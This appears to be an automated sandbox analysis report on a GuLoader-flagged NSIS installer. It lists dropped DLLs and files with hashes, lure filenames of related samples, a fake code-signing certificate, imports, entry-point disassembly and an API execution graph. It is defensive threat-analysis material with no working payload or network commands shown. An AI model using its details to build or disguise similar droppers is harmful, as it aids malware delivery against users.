                                                                      MD5:FC18E33AF950762F0854EE273723A9D5
                                                                      SHA1:CF2D571EF653FA35F961587296B26018F6D0C64A
                                                                      SHA-256:3C55B767A8B4E82B4607EF9CDC48C212D7CDAE3830E567F4A9C2C46A34E3BEAD
                                                                      SHA-512:E974480F6E9A96A69D46411A195E75BF8E32528417C7865C7847E9C6CDD4B712CECACC0C26C4800075947088D3617409C5BC3FF57119D819D2D7C0B18F559901
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:f.u.f.f...f.t......&.U....................................4...f.i.............pJ................................f.........&?ix............................................................:.n.................................f.d.......7..Pv..........................................................f.k.........nz..................................n.....f....43.R][[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[f.....f.........-"..!\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\f..M......f.n..3..:uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuf................6.[ao}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}...f.........3n.5j..................................................:F.........r..f.d..5.o.`.................................................!............(.>.U...............................................f.q.7...4..e9...................................................................`F.............................f.........`......(X.Q,..........................................f.n.
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):14440
                                                                      Entropy (8bit):6.682915152434376
                                                                      Encrypted:false
                                                                      SSDEEP:192:0BzGbXwRxx025WJ+WqlSWOL8/pCuPHnhWgN7aYWsB3gmZdGP2qnaj4FnH+a:oww7+25WJ+Wql+/uPHRN7BB3v3Llqea
                                                                      MD5:4075327E8E558810E05E67CE8E246864
                                                                      SHA1:F136E540C8439548EFF62BE1161F16A01CB0D060
                                                                      SHA-256:25211A075C941DFC9C363547A9EE4442981A4FBCA0C32EA705E94D086D57DAA3
                                                                      SHA-512:B557516E7121DEE78FA4D228FCF1351071D2AD6FC8F27142D4C6FB1B78F70DCB0993F8BE90F7247DBBEC3D3100307329F04F8EA90C9E93F7B618EFC7150D5A6D
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: Cotizaci#U00f3n MT T-819.exe, Detection: malicious, Browse
                                                                      • Filename: Cotizaci#U00f3n MT T-819.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Artemis2A130FA40314.26375.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Artemis2A130FA40314.26375.exe, Detection: malicious, Browse
                                                                      Reputation:low
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....x..........."!..0..............)... ........@.. ..............................P.....`.................................|)..O....@..................h$...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ........................................L....c.y.....>(#W..!...h...$...4V.I..4..w..?'....4a\..F..SG..rH.y......zy...:...C'..t$...6.?yrlQ..D..9...OM....<G.k....B.BSJB............v4.0.30319......`.......#~..<.......#Strings....,.......#GUID...<.......#Blob......................3................................................,...........E...........p.......W.................^...+.^.....^...e.^.....^.....^.....^...L.^...Y.^.................
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:SVG Scalable Vector Graphics image
                                                                      Category:dropped
                                                                      Size (bytes):606
                                                                      Entropy (8bit):4.666157566747791
                                                                      Encrypted:false
                                                                      SSDEEP:12:t4CDqW/ZWcdg+tKAPXUWU4NM0ByWoZLa8jCOopqGEA9A0/:t4CTg+tKA8WDec8YqGEAl/
                                                                      MD5:26B03DAAD39CD54B2343C49AF59F2091
                                                                      SHA1:D2C0728804B143D70A6BC6752A873BBA468C3E1D
                                                                      SHA-256:2EF30F51766DEAA27FECF4ECAF46404D0C37D902E39FE43E2F656CD488041FB2
                                                                      SHA-512:83C528C85B1F7067D134717AEC1638E8FA20E8DAA595E1FBA2F5ECEC747841E36B626C2026ECB61DE9F67A7E3C4D2B0992F71C11F76AA019D36A9E4C4A307CA1
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2.934 0h.132C4.692 0 6 1.332 6 2.986v10.028C6 14.668 4.692 16 3.066 16h-.132C1.308 16 0 14.668 0 13.014V2.986C0 1.332 1.308 0 2.934 0zm2.594 0c.878.714 1.469 1.793 1.469 3v1h2.125c-.075-1.092 1.248-2 2-2 .68 0 1 .012 1 1v1h1.218c1.229-.6 1.782-1.969 1.782-2.687 0-.736-2.386-1.312-3.688-1.312zM7 5v4.313c2.766 2.662 6.125 2.406 6.125 2.406s.353-1.52-1.906-4.03L8.844 5H7.063C7.04 5.003 7.02 4.999 7 5zm2.975 2.532L11.66 9.27c-1.8.166-2.151-.856-1.684-1.737z" style="marker:none" overflow="visible" color="#000" fill="#474747"/></svg>
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):6.609529349840206
                                                                      Encrypted:false
                                                                      SSDEEP:6:6v/lhPysfQu6kkLKgiFG34McOULPqSax5na/p:6v/7FPk9iHMUeSauR
                                                                      MD5:AFE0B10777804AE446C5E4A3F3C2E3B5
                                                                      SHA1:0252C67682C9A5D7260BA70DC03E4091ED9A0923
                                                                      SHA-256:4C42D37B6A5ED6F3230A1506A6BC4687AEF8146174666C0BCCAD8FE2E6DD75B5
                                                                      SHA-512:D76318428038B81D1C29C5812BD22F53DFF53AE93FE86305CD76B750F39BD785EBB9CA69475137CE9A00A4DC588DB4D0C077B723AC847782123C3359E981A9B4
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..1..P.C_.Aj...............O.A..KY.|...b.VS.7x...../...BG.n.z.Tu......9.........X.V.pD....W...(...e...V...{..0...&...|2.l.+m..3..i..3......?[....u....IEND.B`.
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):12288
                                                                      Entropy (8bit):5.814115788739565
                                                                      Encrypted:false
                                                                      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                      MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      • Antivirus: Metadefender, Detection: 3%, Browse
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: EUR_Cert_3883774784847_CMR8494849.pdf.scr.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, Detection: malicious, Browse
                                                                      • Filename: FSC#U007e029872652425_9387636MIG.exe, Detection: malicious, Browse
                                                                      • Filename: FSC#U007e029872652425_9387636MIG.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Variant.Babar.54324.15185.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Variant.Babar.54324.15185.exe, Detection: malicious, Browse
                                                                      • Filename: CPfUbF38MW.exe, Detection: malicious, Browse
                                                                      • Filename: RFQ - 100932843 - 1000219266_MAY 2022.exe, Detection: malicious, Browse
                                                                      • Filename: CPfUbF38MW.exe, Detection: malicious, Browse
                                                                      • Filename: RFQ - 100932843 - 1000219266_MAY 2022.exe, Detection: malicious, Browse
                                                                      • Filename: FRT_INV_MIE29727361008_76.xlsx, Detection: malicious, Browse
                                                                      • Filename: FRT_INV_MIE29727361008_76.xlsx, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exe, Detection: malicious, Browse
                                                                      • Filename: New Tender of National Electricity Company TRISTAN 02 ltd BULGARIA.exe, Detection: malicious, Browse
                                                                      • Filename: 72EED30398363-0983BNDJ0398763536.exe, Detection: malicious, Browse
                                                                      • Filename: 72EED30398363-0983BNDJ0398763536.exe, Detection: malicious, Browse
                                                                      • Filename: Delivery Note DHL AWB NO0023445667 MAY 2022.exe, Detection: malicious, Browse
                                                                      • Filename: Delivery Note DHL AWB NO0023445667 MAY 2022.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1245
                                                                      Entropy (8bit):5.462849750105637
                                                                      Encrypted:false
                                                                      SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                      MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                      SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                      SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                      SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                      Malicious:false
                                                                      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):1245
                                                                      Entropy (8bit):5.462849750105637
                                                                      Encrypted:false
                                                                      SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                      MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                      SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                      SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                      SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                      Malicious:false
                                                                      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.737885668413826
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      File size:150224
                                                                      MD5:09d431a8321ec75d7ff057787c319897
                                                                      SHA1:b709d7968897d774676194b9708f304a6a472086
                                                                      SHA256:1be03967a615254ca0b3eba8b5aaa6b5f5c91c9f03d4fe2692b3675f93c0b26d
                                                                      SHA512:da58f66d20a061f973ce18c894d00279a5b47f8e49b09fd08a6f17ac9c42a806d857709c6e89e30ebe8b4d124a11c15df80459579ffe5ac751a7c80f5798c925
                                                                      SSDEEP:3072:AfY/TU9fE9PEtu22bTj/eZsl2JhPa0TeYFv8YARZ/KtWquoJTvJfS:WYa6LTkXPderR9KLLvJ
                                                                      TLSH:CAE3F1147770E8A3F9731B71AE7597A6AFB2EA021875974F13202A9C3D91380DB1D713
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                                      Icon Hash:9ad8d87078697939
                                                                      Entrypoint:0x403640
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:61259b55b8912888e90f516ca08dc514
                                                                      Signature Valid:false
                                                                      Signature Issuer:CN="Hovedbundens1 alerters SPORTELLNNEDE Bowenite ", O=neglecting, L=Myrtle, S=Mississippi, C=US
                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                      Error Number:-2146762487
                                                                      Not Before, Not After
                                                                      • 5/23/2022 7:12:19 AM 5/23/2023 7:12:19 AM
                                                                      Subject Chain
                                                                      • CN="Hovedbundens1 alerters SPORTELLNNEDE Bowenite ", O=neglecting, L=Myrtle, S=Mississippi, C=US
                                                                      Version:3
                                                                      Thumbprint MD5:C16E17A3C8D303B21C04B936BB6E0DCB
                                                                      Thumbprint SHA-1:08759A518D93EEE4FA4E210966C67D44DAFF49A8
                                                                      Thumbprint SHA-256:DB0429D568507771A725F6E9BCCA1523C3D67F56B97DB4214D1703A8779161C1
                                                                      Serial:FE464BE9561F856B
                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 000003F4h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      push 00000020h
                                                                      pop edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [ebp-14h], ebx
                                                                      mov dword ptr [ebp-04h], 0040A230h
                                                                      mov dword ptr [ebp-10h], ebx
                                                                      call dword ptr [004080C8h]
                                                                      mov esi, dword ptr [004080CCh]
                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                      push eax
                                                                      mov dword ptr [ebp-0000012Ch], ebx
                                                                      mov dword ptr [ebp-2Ch], ebx
                                                                      mov dword ptr [ebp-28h], ebx
                                                                      mov dword ptr [ebp-00000140h], 0000011Ch
                                                                      call esi
                                                                      test eax, eax
                                                                      jne 00007F9C08D6EB0Ah
                                                                      lea eax, dword ptr [ebp-00000140h]
                                                                      mov dword ptr [ebp-00000140h], 00000114h
                                                                      push eax
                                                                      call esi
                                                                      mov ax, word ptr [ebp-0000012Ch]
                                                                      mov ecx, dword ptr [ebp-00000112h]
                                                                      sub ax, 00000053h
                                                                      add ecx, FFFFFFD0h
                                                                      neg ax
                                                                      sbb eax, eax
                                                                      mov byte ptr [ebp-26h], 00000004h
                                                                      not eax
                                                                      and eax, ecx
                                                                      mov word ptr [ebp-2Ch], ax
                                                                      cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                      jnc 00007F9C08D6EADAh
                                                                      and word ptr [ebp-00000132h], 0000h
                                                                      mov eax, dword ptr [ebp-00000134h]
                                                                      movzx ecx, byte ptr [ebp-00000138h]
                                                                      mov dword ptr [0042A318h], eax
                                                                      xor eax, eax
                                                                      mov ah, byte ptr [ebp-0000013Ch]
                                                                      movzx eax, ax
                                                                      or eax, ecx
                                                                      xor ecx, ecx
                                                                      mov ch, byte ptr [ebp-2Ch]
                                                                      movzx ecx, cx
                                                                      shl eax, 10h
                                                                      or eax, ecx
                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x14d0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x22c080x1ec8.data
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .ndata0x2b0000x280000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x530000x14d00x1600False0.302734375data3.56713195596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0x532080x8a8dataEnglishUnited States
                                                                      RT_DIALOG0x53ab00x100dataEnglishUnited States
                                                                      RT_DIALOG0x53bb00x11cdataEnglishUnited States
                                                                      RT_DIALOG0x53cd00xc4dataEnglishUnited States
                                                                      RT_DIALOG0x53d980x60dataEnglishUnited States
                                                                      RT_GROUP_ICON0x53df80x14dataEnglishUnited States
                                                                      RT_VERSION0x53e100x37cdataEnglishUnited States
                                                                      RT_MANIFEST0x541900x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                      DLLImport
                                                                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                      DescriptionData
                                                                      LegalCopyrightCopyright 1997-2013, Nullsoft, Inc.
                                                                      FileVersion10.28.31
                                                                      CompanyNameThermo Electron Corporation
                                                                      LegalTrademarksStringFileInfo: U.S. English
                                                                      CommentsVF Corporation
                                                                      ProductNamePrudential Financial Inc.
                                                                      FileDescriptionLegalTrademarks,Nullsoft and Winamp are trademarks of Nullsoft, Inc.
                                                                      Translation0x0409 0x04b0
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      No network behavior found

                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Target ID:0
                                                                      Start time:20:15:44
                                                                      Start date:23/05/2022
                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
                                                                      Imagebase:0x400000
                                                                      File size:150224 bytes
                                                                      MD5 hash:09D431A8321EC75D7FF057787C319897
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.883009053.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:20.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:15.9%
                                                                        Total number of Nodes:1615
                                                                        Total number of Limit Nodes:46
                                                                        execution_graph 4243 403640 SetErrorMode GetVersionExW 4244 403692 GetVersionExW 4243->4244 4245 4036ca 4243->4245 4244->4245 4246 403723 4245->4246 4247 406a35 5 API calls 4245->4247 4334 4069c5 GetSystemDirectoryW 4246->4334 4247->4246 4249 403739 lstrlenA 4249->4246 4250 403749 4249->4250 4337 406a35 GetModuleHandleA 4250->4337 4253 406a35 5 API calls 4254 403757 4253->4254 4255 406a35 5 API calls 4254->4255 4256 403763 #17 OleInitialize SHGetFileInfoW 4255->4256 4343 406668 lstrcpynW 4256->4343 4259 4037b0 GetCommandLineW 4344 406668 lstrcpynW 4259->4344 4261 4037c2 4345 405f64 4261->4345 4264 4038f7 4265 40390b GetTempPathW 4264->4265 4349 40360f 4265->4349 4267 403923 4269 403927 GetWindowsDirectoryW lstrcatW 4267->4269 4270 40397d DeleteFileW 4267->4270 4268 405f64 CharNextW 4272 4037f9 4268->4272 4273 40360f 12 API calls 4269->4273 4359 4030d0 GetTickCount GetModuleFileNameW 4270->4359 4272->4264 4272->4268 4277 4038f9 4272->4277 4275 403943 4273->4275 4274 403990 4278 403a54 4274->4278 4280 403a45 4274->4280 4284 405f64 CharNextW 4274->4284 4275->4270 4276 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4275->4276 4279 40360f 12 API calls 4276->4279 4445 406668 lstrcpynW 4277->4445 4499 403c25 4278->4499 4283 403975 4279->4283 4389 403d17 4280->4389 4283->4270 4283->4278 4301 4039b2 4284->4301 4287 403b91 4290 403b99 GetCurrentProcess OpenProcessToken 4287->4290 4291 403c0f ExitProcess 4287->4291 4288 403b7c 4508 405cc8 4288->4508 4295 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 4290->4295 4296 403bdf 4290->4296 4292 403a1b 4446 40603f 4292->4446 4293 403a5c 4462 405c33 4293->4462 4295->4296 4299 406a35 5 API calls 4296->4299 4303 403be6 4299->4303 4301->4292 4301->4293 4305 403bfb ExitWindowsEx 4303->4305 4310 403c08 4303->4310 4305->4291 4305->4310 4306 403a72 lstrcatW 4307 403a7d lstrcatW lstrcmpiW 4306->4307 4307->4278 4308 403a9d 4307->4308 4311 403aa2 4308->4311 4312 403aa9 4308->4312 4512 40140b 4310->4512 4465 405b99 CreateDirectoryW 4311->4465 4470 405c16 CreateDirectoryW 4312->4470 4313 403a3a 4461 406668 lstrcpynW 4313->4461 4319 403aae SetCurrentDirectoryW 4320 403ac0 4319->4320 4321 403acb 4319->4321 4473 406668 lstrcpynW 4320->4473 4474 406668 lstrcpynW 4321->4474 4326 403b19 CopyFileW 4331 403ad8 4326->4331 4327 403b63 4329 406428 36 API calls 4327->4329 4329->4278 4330 4066a5 17 API calls 4330->4331 4331->4327 4331->4330 4333 403b4d CloseHandle 4331->4333 4475 4066a5 